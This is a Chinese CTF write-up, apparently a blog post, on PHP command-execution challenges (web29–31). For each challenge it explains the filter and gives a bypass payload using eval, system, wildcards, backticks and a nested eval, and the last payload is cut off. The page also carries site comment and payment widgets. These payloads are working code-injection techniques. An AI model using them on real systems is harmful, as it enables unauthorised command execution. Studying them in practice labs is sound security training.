CISCN(web篇)命令执行

本文详细探讨了从基础命令执行漏洞利用(如eval(), system())到高级技术如数据协议RCE(data://, php短标签)、无参RCE(localeconv()配合scandir())和异或RCE的实战路径。通过实例展示了如何在多重过滤下寻找突破点,包括字符编码、协议技巧和特殊符号的巧妙运用。

命令执行入门

web29请添加图片描述

思路分析
1.常规命令执行漏洞,通过控制输入变量c,借助eval函数实现RCE的目的。
2.题目过滤掉了flag,可以通过通配符绕过。
3.考虑传入system执行系统命令,借助通配符绕过正则匹配。
4.payload:?c=system(‘tac fla*’);

web30

请添加图片描述
思路分析
1.在上题的基础上增加了更多过滤,无法借助system执行系统命令。
2.借助反引号执行系统命令,拼接echo命令,达到RCE的目的
3.payload:?c=echo `tac fla*`;

web 31请添加图片描述

思路分析
1.在上题的基础上过滤了空格,无法使用传统的RCE技巧。
2.拼接eval命令,进行逃逸
3.payload:?c=eval($_GET[a]);&a=system(‘tac flag.ph

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值